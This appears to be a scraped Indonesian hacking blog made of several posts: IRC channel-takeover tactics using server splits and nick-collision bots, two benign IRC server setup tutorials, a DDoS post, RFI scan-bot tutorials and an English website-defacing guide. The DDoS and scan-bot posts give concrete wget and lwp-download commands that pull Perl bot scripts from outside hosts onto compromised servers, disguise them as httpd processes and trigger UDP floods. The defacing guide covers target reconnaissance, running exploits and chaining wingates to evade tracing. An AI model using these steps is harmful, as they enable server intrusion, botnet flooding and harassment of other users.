utama mengehack channel IRC adalah berasal dari kebosanan. Biar
bagaimanapun, banyak alasan-alasan lain yang ada.
Segala yang kamu perlukan adalah keinginan, sedikit kemampuan, dan tentu
saja 'perangkat' yang tepat.
2. Perangkat yang tepat
Segala tukang memerlukan perkakas yang bisa diandalkan dan hacker-hacker
IRC tidaklah terkecuali. Tanpa peralatan ini kamu nggak akan bisa berbu-
at apapun. Semua perangkat yang kamu perlukan bisa didownload dari site
ftp umum. Sebelum saya lanjutkan ke diskusi mengenai apa yang akan kamu
perlukan, adalah penting untuk diketahui bahwa jika kamu membaca dokumen
ini dengan menggunakan account slip/ppp, mungkin ada baiknya kamu usa-
hakan mendapat account shell jika kamu serius mengenai masalah hacking.
(Baca artikel 'UNIX Shell dalam 24 Jam' oleh LithErr di Edisi lalu).
Mungkin banyak yang tidak setuju, tapi menurut pengalaman saya, mIRC a-
taupun program-program skrip IRC lainnya untuk PC tidaklah bisa menan-
dingi kecepatan dan kemudahan dari IRC 'shell script'. Jadi jelaslah
program pertama yang kita perlukan adalah IRC shell script yang sempurna.
Jika kamu bisa koneksi ke IRC melalui account shell kamu, artinya kamu
sudah punya script yang bisa dipakai. Sedangkan untuk yang masih ingin
mencoba hal baru, IRC script favorit saya adalah LICE - bisa didapat da-
ri site ftp umum. Skrip-skrip lain tersedia secara luas, namun kedahsyatan
command-command LICE tidaklah ada duanya. Nah, walaupun sekarang sudah
mungkin kamu berhenti membaca dokumen ini dan mulai menge-hack ops dengan
menggunakan hanya satu skrip, akan masih sangat susah bagi kamu jika kamu
tidak menggunakan alat-alat bantu sampingan. Saya menyarankan dua program
berikut:
1) Multi-Collide-Bot (MCB) dan 2) Link Looker (LL)
Kedua program C diatas adalah prajurit dan spion kamu. Sekali lagi, kedua-
nya tersedia secara umum melalui ftp dan keduanya perlu dikompilasi.
3. Apa yang diperlukan untuk mengambil alih kontrol
Dalam rangka meng-takeover sebuah channel secara efektif, kamu perlu men-
jadi satu-satunya pengguna dengan tanda @ didepan nama kamu. Jika kamu
berhasil melakukan hal ini, maka channel tersebut adalah MILIK KAMU!
Tentu saja, ini adalah sampai status tersebut direbut kembali atau sampai
kamu merasa cape menge-hack channel tsb. Ada banyak cara efektif untuk
mengambil alih kekuasaan di sebuah channel, dan saya akan mulai dengan
yang lebih sederhana.
Dari segala metode, cara yang paling sederhana untuk mendapat op adalah
dengan meminta secara langsung. Anda tertawa, heh? Jelas, seiring dengan
pertumbuhan hackers di IRC, metode meminta ini semakin sukar dilakukan.
Ini terjadi khususnya pada channel-channel yang cukup besar dan cukup
mapan sehingga punya semacam 'kultur' sendiri, seperti #netsex, #teensex,
#windows95, #bawel, #BDSM, #blaklife, #texas, #hack, dan channel-channel
#warez bersaudara. Tentu saja kamu tidak membaca artikel ini hanya untuk
diajari caranya meminta ops. Selain meminta, cara yang cukup efektif ada-
lah dengan memanfaatkan 'split'.
Apa yang dimaksud dengan 'split'? Sebuah 'split' terjadi ketika IRC server
tempat kamu berada memisahkan diri dari internet. Jika kamu ada di sebuah
channel dan tiba-tiba server kamu 'split' dan kamu adalah satu-satunya dari
channel tersebut yang terpisah, kamu akan menjadi sendiri dalam sebuah
channel, dan untuk mendapatkan ops, kamu cukup /leave dan re /join. Dan kamu
bisa melihat bahwa sekarang kamu mempunyai tanda @ didepan nick kamu. Ketika
server irc yang split tadi kembali menghubungkan diri ke net, sekarang kamu
sudah menjadi op. Sekarang kamupun berkata, "Wah, itu sih gampang sekali."
Salah. Yang paling sering terjadi (terutama) di channel-channel besar, banyak
yang akan men-deop kamu, dan merebut kembali status op kamu. Juga, lebih
penting lagi, jika kamu hanya mengandalkan 'luck' dengan cara masuk ke sebuah
channel dan menunggu server kamu untuk 'split' bisa bisa kamu mati duluan
menungguin server split. Lalu apa yang bisa dilakukan oleh sang wannabe IRC
hacker? Link Looker adalah jawabannya.
4. Link Looker
Link looker adalah program kecil yang bertindak sebagai agen spy kamu.
Tanpa menjelaskan mekanisme program yang cukup kompleks, pada dasarnya apa
yang perlu kamu ketahui adalah kegunaan program ini adalah untuk mengetahui
jika ada server IRC yang 'split'. Setiap kali sebuah server memisahkan diri,
LL akan mengidentifikasi server ini dan memberitahukan kamu mengenai hal
ini. LL juga akan memberitahukan kamu ketika sang server kembali bergabung.
Apakah metode ini semakin jelas, sekarang? Ya. Betul sekali. Ketika LL mem-
beritahukan kamu bahwa sebuah server sedang 'split', kamu segera connect
ke server tersebut dan /join channel yang kamu inginkan, dan berharaplah
bahwa tidak ada orang lain yang ikut-ikutan split di channel tsb (jika hal
ini terjadi, kamu nggak akan berhasil menjadi op). Cukup penting diingat
bahwa mengambil alih channel dengan cara menunggu split dan rejoin efektif
berlaku di channel-channel berukuran kecil sampai sedang, ataupun channel
yang tidak terorganisasi atau memanfaatkan 'bots' sebagai pelindung. Apa
yang perlu kamu lakukan adalah cukup dengan menunggu server split untuk re-
join kembali dan begitu kamu menjadi op di sebuah channel, luncurkan perin-
tah 'mass deop' (termasuk dalam skrip kamu dan merupakan kunci utama untuk
mem-'bersihkan' channel dari op-op lain). Dalam channel-channel yang lebih
besar dan lebih terorganisasi, biasanya cara diatas tidak akan bisa dilaku-
kan secara mudah dikarenakan hadirnya bot-bot penjaga dan juga skrip-skrip
'IRC Warrior' yang digunakan oleh para op beneran (manusia).
5. Bots dan Scripts
Channel channel yang lebih besar dan lebih terorganisasi, biasanya dijaga o-
leh bot-bot yang biasanya berfungsi untuk menjaga agar op tetap berfungsi di
pemilik op yang sah dengan cara kehadirannya yang berkesinambungan, dan juga
mempunyai kemampuan untuk mempertahankan channel dari serangan IRC hackers.
Ada banyak tipe dan jenis bot-bot ini, dan yang paling bagus biasanya juga
mempunyai kemampuan deopping 'splitters' seperti anda. Bukan hanya itu, bia-
sanya banyak pula human ops yang mempunyai skrip (seperti LICE) yang bisa
men-deop kamu secara otomatis. Nah, dengan semakin kompleksnya dunia IRC,
sebuah fenomena baru yang sering terjadi adalah 'desynch'. Hal ini adalah ke-
jadian cukup gila yang mengambil tempat saat kamu 'rejoin' dari 'split' dan
skrip kamu mendeop op-op asli sedangkan secara bersamaan skrip milik op-op
asli men-deop kamu. Yang akan terjadi adalah server-server yang terlibat akan
menjadi bingung dan akan memberi perintah desinkronisasi satu sama lain. Hal
ini perlu dihindari. Bagaimana caranya untuk mengambil alih channel yang di-
lindungi oleh skrip-skrip dan bot-bot? Tentu saja dengan menggunakan MCB!
6. Multi-Collide-Bot (MCB)
MCB adalah alat bantu yang berharga bagi kamu. MCB adalah juga sebuah program
cantik yang menciptakan sebuah 'clone' dari nick yang ingin kamu bunuh (nick
milik op-op lain di sebuah channel) di sebuah server yang sedang mengalami
'split' (ya, server yang ditemukan oleh Link Looker). Secara garis besar, kamu
berikan sang MCB nama / nama-nama dari op-op yang ingin kamu bantai, dan beri-
tahukan program ini server split mana yang akan membuat 'clone' tsb saat
rejoin. Akibat dari Bot ini adalah, target kamu akan terlempar keluar dari
channel (melepas status op). Jika kamu berhasil membunuh semua op di channel
target kamu, maka kamu akan menjadi satu-satunya op di channel itu. Tak ada
yang lebih memuaskan daripada menyaksikan 'nick kill messages' dari op yang
kamu bunuh.
Ada beberapa hal yang kamu perlu perhatikan sebelum kamu mencoba untuk meng-
takeover sebuah channel di IRC. Yang paling jelas dan penting adalah menge-
tahui siapa-siapa yang akan kamu serang. Amati channel ybs selama beberapa
menit, catat siapa yang merupakan op asli dan siapa yang merupakan bot, dan
juga siapa diantara mereka yang melakukan 'deop splitters'. Mereka-mereka
inilah yang perlu kamu targetkan untuk dibunuh oleh MCB. Hal yang juga perlu
diperhatikan (dan kalian yang kebetulan juga merupakan ChanOp di sebuah chan
ini adalah pertahanan yang bisa kamu andalkan) adalah op-op yang secara otomatis
mengganti nick mereka saat mereka mendeteksi sebuah 'split'. Jika hal ini
terjadi maka MCB kamu tidak akan berfungsi seperti yang diinginkan.
Cara yang bisa dimanfaatkan adalah dengan memonitor dua sisi split. Jadi de-
ngan menggunakan satu MCB di server yang terpisah, dan tetap berada di channel
yang masih terhubung ke net.
7. Hal-hal asyik yang bisa dilakukan.
Sekali kamu berhasil meng-takeover sebuah channel, tentu saja banyak yang bisa
kamu lakukan. Biar bagaimanapun, biarlah saya bagi pengalaman mengenai beberapa
ide cemerlang yang dijamin akan menjengkelkan musuh-musuhmu di irc:
- Ledek (mantan) ops di channel tsb. Setelah kena 'kick' tentu mereka akan kem-
bali dan mengutuk dan menyumpah kamu. Mungkin seperti "get a life, loser" etc.
ingatlah, jangan diambil terlalu personal.Ingat juga bahwa merekalah yang perlu
'get a life' sebab merekalah biangnya, toh mereka pula yang tadinya punya op.
lanjutkanlah ledekanmu, dan jika mereka menjadi benar-benar kasar, kick saja.
Saat mereka kembali, bisa juga kamu bumbui dengan "Now, now. I am in full con-
trol of this channel and will not tolerate such language ... heheheh "
- word ban. di LICE bisa kamu pilih kata/kalimat yang akan mengakibatkan user di-
kick tiapkali dia menyebut kata yang di-ban. gunakan teknik ini di #teensex
atau #netsex, dan tiap kali ada yang menyebut "sex" atau "fuck" etc.
- satu lagi, adalah dengan memoderator channel. Yang bisa dilakukan ialah dengan
/mode +m untuk mengakibatkan tak ada seorangpun yang bisa berbicara. jadi
kamulah satu satunya yang bisa bicara di channel ini. Berguna jika kamu ingin
menyampaikan pesan/pendapat tanpa interupsi.
- dll. dll.
semoga ini menjadi bahan referensi untuk kalian yang berkecimpung di dunia
IRC. Gunakan pengetahuan disini untuk melindungi kamu sendiri... dll
Diposting oleh anak nyangkruq di 05.55 0 komentar
Membuat Server IRC dengan BAHAMUT IRC
Internet Relay Chat (IRC) adalah suatu bentuk komunikasi di Internet yang diciptakan untuk komunikasi kelompok di tempat diskusi yang dinamakan channel (saluran), tetapi juga bisa untuk komunikasi jalur pribadi.
IRC diciptakan oleh Jarkko Oikarinen (nickname "WiZ") pada akhir Agustus 1988 untuk menggantikan program di BBS yang disebut MUT (MultiUser Talk), di Finlandia di sebut OuluBOX. Oikarinen menemukan inspirasi Bitnet Relay Chat yang beroperasi di dalam Jaringan Bitnet.
Saat ini saya sudah berhasil membuat server IRC dengan menggunakan BAHAMUT IRC pada FEDORA 7.0, untuk mendapatkannya silahkan download di : http://bahamut.dal.net/download.php
File yang di dapat adalah : bahamut-1.8.4-release.tar.gz
lakukanlah ekstrak di lokasi yang anda pilih, sebagai contoh saya membuat di lokasi yang saya pilih :
[root@mis09 bafrin]# tar zxfv bahamut-1.8.4-release.tar.gz
Setelah proses ekstrak selesai, maka akan terbentuk sebuah folder :
[root@mis09 bafrin]# ls
bahamut-1.8.4 FileZilla_3.0.11_i586-linux-gnu.tar.bz2
bahamut-1.8.4-release.tar.gz Music
Desktop Pictures
Documents Public
Download Templates
Fedora-9-i386-DVD.iso Videos
FileZilla3 xchat-2.8.4-0.i586.rpm
Tampak folder bahamut-1.8.4
masuk ke dalam folder tsb, di dalam nya sudah ada :
[root@mis09 bafrin]# cd bahamut-1.8.4
[root@mis09 bahamut-1.8.4]# ls
CHANGES config.sub include LICENSE src
config.guess configure INSTALL Makefile TODO
config.log configure.in install-sh Makefile.in tools
config.status doc LICENCE.pcre README zlib
Untuk melihat cara instalasinya anda dapat membuka dan membaca file INSTALL
[root@mis09 bahamut-1.8.4]# nano INSTALL
dan isi dari File tsb :
HOW TO BUILD:
-------------
1. Run the configure script. It will setup include/setup.h and the
Makefiles to match your system:
./configure
Type ./configure --help to see different options. Most people will not
need to alter these.
2. [DISCOURAGED] Edit the the "include/config.h" file. This allows you to
change various options of how the ircd will operate. Usually the defaults
are OK.
3. "make" should build ircd.
4. "make install" will install the ircd, config converter, and documents
to the directory set by ./configure
5. Edit example.conf in your install directory, and move it to "ircd.conf".
6. Run the binary! ircd will look in the directory you are executing from
for an ircd.conf first, then it will look to the directory local to itself.
You may override these options by specifying a config file using:
./ircd -f path/to/ircd.conf
Best of luck!
-The Bahamut Team
$Id: INSTALL 1303 2006-12-07 03:23:17Z epiphani $
ikutin aja langkah2 nya,
dan nanti anada akan menemukan folder ircd di dalan root : [root@mis09 bahamut-1.8.4]# cd /root/ircd/
[root@mis09 ircd]# ls
convert_conf ircd ircd.motd ircd.pid mkpasswd opers.txt reference.conf template.conf
Copykan file template.conf menjadi ircd.conf
editlah ircd.conf, saat ini. ip server saya 192.168.90.108 (sesuaikan ip dari server anda)
# =========================================================================
# QUICKSTART: server configuration (see reference.conf for details)
# =========================================================================
/* server name and administration info */
global {
name not.configured; # IRC name of the server
info "located on earth"; # A short info line
admin {
"An unconfigured server"; # Three information lines sent
"An unknown administrator"; # in reply to ADMIN command
"email@somewhere.earth";
};
};
/* server options */
options {
network_name unconfigured; # A name is needed even if not linked
local_kline admin@server; # Contact email for server bans
show_links; # Show servers in LINKS
allow_split_ops; # Give ops in empty channels
// use these options when services is on the network
services_name services.name; # Name of services (NS/CS/MS/RS) server
stats_name stats.name; # Name of stats (OS/SS/HS) server
network_kline admin@net; # Contact email for network bans
nshelpurl "http://help"; # Nick registration help page
// if you need to link more than 1 server, uncomment the following line
# servtype hub;
};
/* where to listen for connections */
port {
port 6667; # Port to listen on
bind 192.168.90.108; # IP address to listen on
};
/* more listening ports */
#port { port 6668; bind 127.0.0.1; };
#port { port 6669; bind 127.0.0.1; };
#port { port 7000; bind 127.0.0.1; };
/* allow clients to connect */
allow {
host *@*; # Allow anyone
class users; # Place them in the users class
};
/* connection class for users */
class {
name users; # Class name
maxusers 1000; # Maximum connections
pingfreq 90; # Check idle connections every N seconds
maxsendq 100000; # 100KB send buffer limit
};
/* connection class for server operators */
class {
name opers;
pingfreq 90;
maxsendq 500000; # 500KB limit for opers
};
/* the server administrator */
oper {
name admin; # Username
passwd secret; # Password
access OAaRD; # Server Administrator
host *@192.168.0.*; # Must be connecting from here
host *@10.64.64.*; # Or from here
// insert other other hostmasks here
class opers; # Belongs in the opers class
};
/* for services */
super {
"services.name";
"stats.name";
// insert any other special servers here
};
/* reserved nicknames */
restrict { type nick; mask "NickServ"; reason "reserved for services"; };
restrict { type nick; mask "ChanServ"; reason "reserved for services"; };
restrict { type nick; mask "MemoServ"; reason "reserved for services"; };
restrict { type nick; mask "RootServ"; reason "reserved for services"; };
restrict { type nick; mask "OperServ"; reason "reserved for services"; };
restrict { type nick; mask "StatServ"; reason "reserved for services"; };
restrict { type nick; mask "HelpServ"; reason "reserved for services"; };
restrict { type nick; mask "services"; reason "reserved for services"; };
/* === these next two blocks are for linking to a hub === */
/* class for uplink hub */
class {
name hub;
pingfreq 120; # Idle check every 2 minutes
connfreq 300; # Try autoconnect every 5 minutes
maxsendq 1000000; # 1MB send queue
maxlinks 1; # Autoconnect to only 1 hub at a time
};
/* our uplink hub */
connect {
name hub.name; # Hub's IRC name
host 172.16.4.2; # Hub's IP address
port 7325; # Autoconnect to hub's port 7325
bind 127.0.0.1; # We connect from this IP
apasswd secret; # We accept this password from hub
cpasswd secret; # We send this password to hub
flags H; # It is a hub
class hub; # Use hub class
};
/* === these next two blocks are for linking to services === */
/* class for services */
class {
name services;
pingfreq 60; # Idle check every minute
maxsendq 5000000; # 5MB backlog buffer
};
/* our services */
connect {
name services.name; # Services' IRC name
host 192.168.90.108; # IP address services connects from
apasswd secret; # Password services sends
cpasswd secret; # Same password
class services;
};
Setelah selesai, ketiklah comannd :
[root@mis09 ircd]# ./ircd
bahamut-1.8(04) booting...
Security related issues should be sent to coders@dal.net
All other issues should be sent to dalnet-src@dal.net
Configuration Loaded.
Ircd is now becoming a daemon.
[root@mis09 ircd]#
Bila di cek service nya apakah sudah jalan ? dengan perintah :
[root@mis09 ircd]# ps ax |grep ircd
2875 ? Ss 0:00 ./ircd
2879 pts/0 R+ 0:00 grep ircd
[root@mis09 ircd]#
Server IRC anda sudah jalan, dan silahkan setting untuk irc clientnya.
Tampak service nya sudah jalan pada nomor service 2875, untuk mematikan service nya :
[root@mis09 ircd]# kill -KILL 2875
Diposting oleh anak nyangkruq di 05.54 0 komentar
Membuat server IRC sendiri
Membuat server IRC sendiri
2 July 2007 in Information Technology, Internet
IRCd (Internet Relay Chat Development)
Adalah sebuah software yang di kembangkan untuk
keperluan komunikasi
antar komputer yang terhubung ke Internet. Salah satu
software ircd yang
cukup terkenal adalah “hybrid”. Hybrid di kenalkan
pertama kali oleh
EFNET (Eris Free Network) , adalah salah satu dari
Network yang tertua di
dunia. Di Indonesia-pun telah berdiri jaringan Network
yang menggunakan
Hybrid yaitu AllNetwork atau lebih di kenal Anet
Network.
Sotfware ircd dapat anda download di
http://www.ircd-hybrid.org/
Menginstall IRCd
Ambil source ircd contohnya (ircd-hybrid-6.0.tgz) di
mana saja anda suka.
Ada dua cara dalam mengambil files :
1. Dengan telnet gunakan perintah : wget
http://www.chrisna.biz/ircd-hybrid-6.0.tgz
2. Dengan menggunakan WS_FTP atau CuteFtp and bisa
upload file tersebut.
Setelah file tersedia di shell baru anda melakukan
exstrac files / Tar
dengan cara :
a. gunzip ircd-hybrid-6.0.tgz
b. tar -zxvf ircd-hybrid-6.0.tgz
Masuk ke direktori ircd anda , dengan cara cd
nama-dir-ircd-anda
ketik :
./configure
make
make install
setelah semua di lakukan anda bisa mulai melakukan
editing (jangan lupa
folder ircd anda).
– contoh config.h — download di (sini)
Mengedit config file
Pengeditan di lakukan pada :
perubahan directory penginstalan file
perubahan directory program execusion
perubahan nama network
#define encrypt password operator
#define HUB, dll yang di perlukan.
Setelah file tercompile anda di haruskan mengedit
“ircd.conf”, file ini
telah tersedia setelah anda berhasil mengcompile
ircd-hybrid-6.0.tgz
tersebut. ircd.conf merupakan file configurasi yang
akan di jalankan
bersama file ircd.exe nya. Perintahnya ./ircd
(otomatis membaca
ircd.conf). Di harapkan anda berhati hati dalam
mengedit file ircd.conf,
karena bila ada kesalahan maka ircd server tidak akan
sempurna seperti
yang anda harapkan.
– contoh ircd.conf — download di
http://chrisna.biz/irc/ircd.zip
——————–
Buat IRC Sever Sendiri ? – Indo Irc
Script by chrisna
Diposting oleh anak nyangkruq di 05.48 0 komentar
DDOS ATTACK
dikit aja gua berbagi, semua yang gua ada ini bukan untuk cari perhatian, dan dibilang jago...buat yang udah senior ng usah di baca acuhkan saja
ddos menurut gua ada cara
1. lewat mirc ( chating )
2. lewat php shell atau root ( cari di google banyak ) yang gratisan maupunya yang injekan ( cari aja sendiri istilah injekan )
A. lewat mirc
1. loe bikiin chanel sendiri terserah di server mana
contoh : /server irc.indoirc.net
/j #namachanelloe
2. loe cari lg shell nya buat bikin bot, cara dapatin nya banyak cara, 1. minta, 2. nyolong 3. beli kalo bokap loe tajir
3. kalo shell / root nya udah dapat loe login ke shell nya dan ketik ini
wget ngentot-yuk.say.com/ngewek.pl
atau loe copas ini ke notepad dan aplod ke web loe ( terserah yang gratisan atau beli )
3. loe jalanin script itu ( complie ) dengan perintah
perl namafileloe.pl
4. loe pencet panah ke atas di shell loe itu
5. bot udah join ke chan loe tadi
6. untuk menjalankan bot itu lo pake ini
!muach @udpflood
Diposting oleh anak nyangkruq di 05.47 0 komentar
bvuat bot scan rfi
Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection topic saya ini. saya anggap kalian sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.
ok.. kita mulai.
1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
2. Masuk ke shell anda
3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
11. Silahkan dipergunakan sebaik mungkin
Keterangan lebih lanjut Nyengir :
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)
Semoga membantu…
Credit to : Rolling Eyes
Editing sedikit :
banyak rekan saya dari IRC yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut
* Shell lambat
* Script yang tidak mau jalan di shell
sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..
Dan untuk selanjutnya, mungkin akan saya buat topic mengenai bot scan yang lainnya. jadi harap ditunggu
Diposting oleh anak nyangkruq di 03.45 0 komentar
Jumat, 23 Oktober 2009
Membuat BOT Scan di mIRC
Disini kita menggunakan BOT Scan Mic22 untuk scanner bugs RFI.
BOT ini ditulis dengan bahasa Perl
>>> Jangan tanya saya tentang Perl, silahkan tanya sama Umz Google
Singkatnya... Perl adalah salah satu bahasa script... Nah yang kita gunakan sekarang adalah Bot Scan berbasis perl atau dikenal dengan .pl... nahh bot scan ini berfungsi mencari target shell/inject dengan cara automatic scan menggunakan search engine. Hal ini memudahkan kita untuk mencari webserver yang vulnerable...
Script BOT Scan dan File pendukungnya dapat diambil disini...
Nah... Sekarang kita mulai editing BOT Scan-nya agar join ke channel kita
Perhatikan bagian ini... Silahkan edit sesuai keperluan...
Tapi jangan sampe salah masukkan konfigurasinya... Bisa ngga jalan BOT-nya...
###############CONFIGURATION#########
my $processo = "/usr/local/apache/bin/httpd -DSSL"; >>> Ini Fake Process yang berjalan di background
my $printcmd="http://destra.ca/s"; >>> Ini script yang dipakai buat injection
my $server="swiftco.wa.us.dal.net"; >>> Ini server IRC tempat mangkal-nya BOT
my $porta="6667"; >>> Ini port yang digunakan oleh server IRC
my $nick="Cleaning_Service"; >>> Ini nick yang digunakan untuk BOT
my $chan="#hackers-center"; >>> Ini channel tempat mangkalnya BOT
###############END OF CONFIGURATION####
Oke... Konfigurasi selesai...
Selanjutnya liat bagian ini...
my $cmd="http://www.alkautsar-bdl.sch.id/safe.txt";
File safe.txt merupakan source pendukung untuk BOT Mic22... Jangan sampe link tersebut tidak bisa diakses...
Solusinya... Upload link tersebut bersama-sama dengan source BOT yang akan kita jalankan... Dan ganti link tersebut sesuai dengan url yang menuju file safe.txt...
Jangan menggunakan file safe.txt dari source lainnya... Karena bisa saja berbeda versinya...
Nah... Sekarang untuk menjalankan BOT Scan pada injekan...
Karena kita belum memiliki BOT Scan sendiri... Injekan bisa liat di channel yang sudah ada BOT Scan atau minta kepada yang sering melakukan scanning...
>>> Jangan minta sama saya yaaaa... :lol: :lol: :lol:
1. Upload script di hosting sendiri atau di hosting gratisan... Yang penting bisa diakses... Selalu bawa script tersebut di FD...
2. Masuk ke server yang vulnerable... Cari direktory yang writable (Bisa ditulis) atau file permision-nya 777... Liat di command untuk r57... Atau pake perintah “find / -perm 777 -type d”
3. Download file script BOT Scan... Perintahnya...???
wget http:://www.link-file-hostingan-loe.com;ls -al atau
lwp-download http:://www.link-file-hostingan-loe.com;ls -al atau
curl -o http:://www.link-file-hostingan-loe.com scan.txt
4. Kalo ngga bisa juga... Upload aza langsung dari r57 atau c99...
5. Gunakan perintah "mv [file awal] [file baru]" untuk mengubah nama file
6. Eksekusi file scanner menggunakan perintah "perl [nama file]
7. Tunggu BOT-nya di channel... Good Luck
8. Untuk melihat proses di background menggunakan perintah "ps x"
9. Untuk mematikan proses di background menggunakan perintah "kill -9 [PID Number]
Tambahan:
Tutorial ini hanya berjalan pada mesin LINUX atau keluarga OS UNIX
Semua command diatas digunakan tanpa tanda "
Kalau BOT-nya ngga join di channel... Ada beberapa hal yang bisa jadi problem...
1. Server tidak mendukung Perl
2. Server tidak kuat menjalankan program BOT Scan
3. BOT Scan di blok oleh firewall
4. IP server di AKILL oleh server IRC dimana kita joinkan BOT
5. Konfigurasi script ada yang salah
Untuk source BOT Scan diatas... Daftar perintah yang digunaka adalah...
!help >>> Untuk melihat daftar perintah
!clean [bug] [dork] >>> Untuk melakukan scanning
!mwultimi >>> Untuk melihat list bug terbaru di www.milw0rm.com
!engine >>> Untuk melihat search engine yang support pada BOT
!info >>> Untuk melihat info BOT
!kill >>> Untuk mematikan BOT... Ini perintah rahasia... Sebaiknya diganti sesuai dengan selera ADMIN BOT
Rasanya sudah panjang lebar uraian saya... Kurang lebihnya mohon maaf... Untuk para master yang sudah paham... Jangan diejek... Silahkan tambahkan saja apa yang kurang... Kritik dan saran silahkan hubungi saya di channel hackers-center@DALNET...
Diposting oleh anak nyangkruq di 03.08 0 komentar
deface
First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are made of. I don't encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc.. (it is only right to put up some kind of warning. now go have fun ;)
This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vuln Hosts.
2. Getting In.
3. Covering Your Tracks
It really is easy, and I will show you how easy it is.
1. Finding Vuln Hosts
This section needs to be further broken down into two catigories of script kiddies: ones who scan the net for a host that is vuln to a certain exploit and ones who search a certain site for any exploit. The ones you see on alldas are the first kind, they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, ie. "I make sure people keep up to date with security, I am a messanger" or "I am spreading a political message, I use defacments to get media attention". People who deface to get famous or to show off their skills need to grow up and relize there is a better way of going about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:
Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open ports. This is a favorate technique of those guys you see with mass hacks on alldas.
Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the server if exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)
Wasn't so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.
2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure that the exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle research into how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet).
Don't go compiling exploits just yet, there is one more important thing you need to know
Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn't that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn't mean that they don't have another logger or IDS running somewhere else. (even on another box). Since most script kiddies don't know the skill of the admin they are targetting they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolden or second isp account to begin with, so even if they get tracked they won't get caught. If you don't have the luxery of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the logs of any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just secure their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don't do anything to piss the admin off too much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?
We will keep this very short and too the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the time, so you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:
212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23
to use them we go to telnet and connect to them on port 23. we should get a responce like this:
CSM Proxy Server >
to connect to the next wingate we just type in it's ip:port
CSM Proxy Server >202.134.244.215:1080
